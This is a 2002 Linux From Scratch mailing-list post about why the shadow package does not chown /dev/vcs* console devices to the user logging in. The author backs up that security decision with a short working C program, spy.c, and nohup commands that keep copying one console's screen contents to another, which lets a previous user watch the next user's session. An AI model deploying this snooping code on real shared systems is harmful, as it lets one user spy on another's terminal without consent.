shadow chown(tty) - problem

Richard Lightman richard at nezumi.plus.com
Sun Sep 1 03:00:33 PDT 2002


* YuX <yux at cg.ukrtel.net> [2002-09-01 08:29]:
> 
> #ifdef __linux__
>  /*
>   * Please don't add code to chown /dev/vcs* to the user logging in -
>   * it's a potential security hole.  I wouldn't like the previous user
>   * to hold the file descriptor open and watch my screen.  We don't
>   * have the *BSD revoke() system call yet, and vhangup() only works
>   * for tty devices (which vcs* is not).  --marekm
>   */
> #endif
> 
> --- don't see problem here :(
> 
I log in, and run:
nohup ./spy /dev/vcc/1  /dev/vcc/2  &
nohup ./spy /dev/vcc/a1 /dev/vcc/a2 &

Then log out. You log in, and everything you see on terminal 1 appears
on terminal 2. With a bit more effort, I could get the output to cross
a network. I own the spy processes, so you cannot kill them - unless
you are root.

I could get conlogin (which is setuid) to kill this sort of thing.
I will get back to you if it works.

Richard
-------------- next part --------------
/* spy.c */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv) {
	int in,	out;
	char buffer[4096];
	ssize_t s;

	if (argc < 3) return 1;
	if (0 > (in = open(argv[1], O_RDONLY))) goto fail;
	if (0 > (out= open(argv[2], O_WRONLY))) goto fail;

	/* Once a second, rewind both devices and copy the screen contents. */
	while(1) {
		sleep(1);
		/* lseek() takes (fd, offset, whence) and returns -1 on error. */
		if (0 > lseek(in, 0, SEEK_SET)) goto fail;
		if (0 > lseek(out,0, SEEK_SET)) goto fail;
		while(0 < (s = read(in, buffer, sizeof buffer)))
			write(out, buffer, s);
		if (0 > s) break;
	}
fail:	printf("Problem: %m\n");
	return 1;
}


More information about the lfs-dev mailing list